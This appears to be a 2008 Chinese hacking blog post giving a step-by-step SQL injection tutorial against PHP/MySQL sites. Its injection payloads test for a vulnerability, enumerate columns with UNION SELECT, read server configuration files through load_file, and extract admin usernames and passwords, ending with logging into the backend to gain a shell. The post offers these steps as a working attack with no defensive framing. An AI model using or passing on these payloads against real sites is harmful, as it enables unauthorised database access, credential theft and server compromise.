我的黑客生活
我的黑客生活
我是黑客吗?没有人给我回答 我还是学生.还要完成我的学业 注意: 本人可以回答问题 第一个免费,第二个免费,第三个收费,以后可以考虑打折!
临川一中不是人待的地方!!
博客信息
博主:DataBaseOwner 
栏目分类
最新文章
最新评论
标签列表
博客搜索
日志存档
·2009-1 ( 1 )
·2008-10 ( 4 )
·2008-7 ( 4 )
·2008-6 ( 5 )
·2008-5 ( 1 )
·2008-4 ( 3 )
·2008-2 ( 10 )
·2008-1 ( 53 )
友情链接
统计信息
访问:91085 次
今日访问:4次
日志: -165篇
评论: 29 个
留言: 9 个
建站时间: 2008-1-12
博客成员
DataBaseOwner 管 理 员
数字狼 管 理 员
最近访客



PHP难不?PHP注入的简单步骤
作者:DataBaseOwner 提交日期:2008-1-12 16:49:00 正常| 访问量:399

文章为小3原创 转贴请说明~~~鄙视盗用~~~



1~判断注入点~ :';and 1=1;and 1=2 -------(跟ASP一样)
2~判断是否能进行UNION查询~:and ord(mid(version(),1,1))>51 -------(通过版本判断4.0以上 可用UNION查询)
3~利用order by 暴字段~:order by X -------(X为数字如果返回正 常则说明字段大于X)
4~利用union来查询准确字段~: and 1=2 union select 1,2,3,....... -------(返回正常,就说明猜 到准确字段数。)
5~判断数据库连接帐号有没有写权限~:and (select count(*) from mysql.user)>0
 ------- (如果返回错误我们就 猜管理员的帐号密码
 如果返回正常,则可 以通过
and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 [注意:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件])
6~猜解XXXX表~:and 1=2 union select 1,2,3,4,5,6.... from user --------(XXXX为表单名,返 回正常,说明存在这个表)
7~猜XXX字段~:and 1=2 union select 1,username,3,4,5,6.... from XXXX -------(同样道理,自己替 换,如果在2字段显 示出字段内容则存在些字段)
8~同理再猜解password字段,猜解成功再找后台登录上SHELL~


#日志日期:2008-1-12 星期六(Saturday) 晴 送小红花 推荐指数:复制链接 举报


登录 | 新人注册>>
输入您的评论:(不支持HTML标签)


验证码
本文所属博客:我的黑客生活
引用地址:


copyright blog.tianya.cn

© 天涯社区